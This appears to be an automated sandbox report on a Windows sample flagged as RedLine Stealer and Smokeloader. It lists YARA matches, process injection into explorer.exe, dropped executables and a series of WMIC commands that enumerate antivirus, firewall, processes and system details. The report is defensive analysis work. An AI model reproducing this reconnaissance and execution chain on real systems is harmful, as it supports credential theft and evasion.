                  Source: 00000006.00000002.2315796782.00000000008AE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000005.00000002.2024314586.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000005.00000002.2024197978.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000008.00000002.2562004757.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000006.00000002.2315529494.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: v173TV3V11.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C35.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: vejhhuh.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: bsjhhuh.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@81/14@6/4
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_009117D6 CreateToolhelp32Snapshot,Module32First,0_2_009117D6
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AFFC84 CoInitializeEx,CoCreateInstance,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,CoUninitialize,9_2_00007FF763AFFC84
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\bsjhhuhJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C35.tmpJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: v173TV3V11.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;324&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;408&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;484&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;492&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;552&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;620&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;628&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;752&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;776&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;784&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;872&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;920&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;988&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;364&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;356&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;696&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;592&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1044&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1084&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1176&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1200&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1252&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1296&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1316&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1408&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1476&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1488&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1496&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1552&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1572&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1652&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1724&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1824&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1840&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1940&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1948&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1956&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2036&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1932&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2064&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2152&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2216&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2268&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2388&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2396&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2508&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2528&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2552&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2608&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2616&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2624&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2632&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2748&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2900&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2012&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3304&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3536&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3768&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3816&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4032&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2544&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3404&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5108&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5484&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5704&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5860&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4920&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1328&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4584&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1744&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2364&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;564&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1836&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2412&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6720&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6940&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6496&quot;::GetOwner
                  Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: A115.tmp.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: unknownProcess created: C:\Users\user\Desktop\v173TV3V11.exe "C:\Users\user\Desktop\v173TV3V11.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\bsjhhuh C:\Users\user\AppData\Roaming\bsjhhuh
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C35.exe C:\Users\user\AppData\Local\Temp\C35.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\vejhhuh C:\Users\user\AppData\Roaming\vejhhuh
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\451E.exe C:\Users\user\AppData\Local\Temp\451E.exe
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeProcess created: C:\Windows\System32\cmd.exe cmd
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
